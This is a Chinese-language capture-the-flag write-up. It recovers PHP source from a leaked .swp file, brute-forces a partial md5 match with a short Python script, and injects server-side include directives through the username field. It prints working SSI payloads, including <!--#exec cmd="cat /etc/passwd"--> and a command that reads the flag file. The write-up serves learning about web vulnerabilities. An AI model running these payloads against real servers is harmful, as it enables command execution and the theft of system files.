开启靶机,题目提示easysearch。。。简单的寻找?应该不是考SQL注入类型的题,后来利用御剑扫出了隐藏文件/index.php.swp,这个文件是一个临时交换文件,用来备份缓冲区中的内容。如果文件正常退出,则自动删除此文件
访问获得源码
<?php
ob_start();
function get_hash(){
$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-';
$random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//Random 5 times
$content = uniqid().$random;
return sha1($content);
}
header("Content-Type: text/html;charset=utf-8");
***
if(isset($_POST['username']) and $_POST['username'] != '' )
{//以post方式提交username且非空
$admin = '6d0bc1';
if ( $admin == substr(md5($_POST['password']),0,6)) {//md5后的password的前六位需要等于6d0bc1即可绕过
echo "<script>alert('[+] Welcome to manage system')</script>";
$file_shtml = "public/".get_hash().".shtml";
$shtml = fopen($file_shtml, "w") or die("Unable to open file!");
$text = '
***
***
<h1>Hello,'.$_POST['username'].'</h1>
***
***';
fwrite($shtml,$text);
fclose($shtml);
***
echo "[!] Header error ...";
} else {
echo "<script>alert('[!] Failed')</script>";
}else
{
***
}
***
?>首先要求以post传入的username非空,且md5加密后的值前六位等于6d0bc1,然后在弹窗后会尝试打开一个SHTML文件
在SHTML文件中使用SSI指令引用其他的html文件(#include),服务器会将SHTML中包含的SSI指令解释,再传送给客户端。比如说框架是固定的,但是里面的文章,其他菜单等即可以用#include引用进来
什么是SSI?
SSI就是在HTML文件中,可以通过注释行调用的命令或指针,即允许通过在HTML页面注入脚本或远程执行任意命令
注意:这里shtml需要抓包后才可以看到
首先利用垃圾py脚本跑一下,将6d0bc1带入脚本
import hashlib
for i in range(1000000000):
a = hashlib.md5(str(i).encode('utf-8')).hexdigest()
if a[0:6] == '6d0bc1':
print(i)
print(a)
爆出来的值也就是password登录,username随意输入即可,然后利用burp截包重放
访问弹出的/public/41d7dc9fba53098cbddc3741feecca758679ac56.shtml
回顾一下整个流程,首先password是不可更改的值,唯一可控的地方就是之前随意输入的username了,尝试在这里尝试上面学习的SSI注入
//直接执行服务器上的各种程序<#exec>
<!–#exec cmd="文件名称"–>
<!--#exec cmd="cat /etc/passwd"-->
<!–#exec cgi="文件名称"–>将username对应的值改为<!--#exec cmd="ls ../"-->,然后访问生成的.shtml页面 
获取flag的payload:
username=<!--#exec cmd="cat ../flag_990c66bf85a09c664f0b6741840499b2"-->&password=2020666 ?
访问/public/d3a4357b1d6452516fe4fde3f9393903ffaeddcd.shtml获得flag ?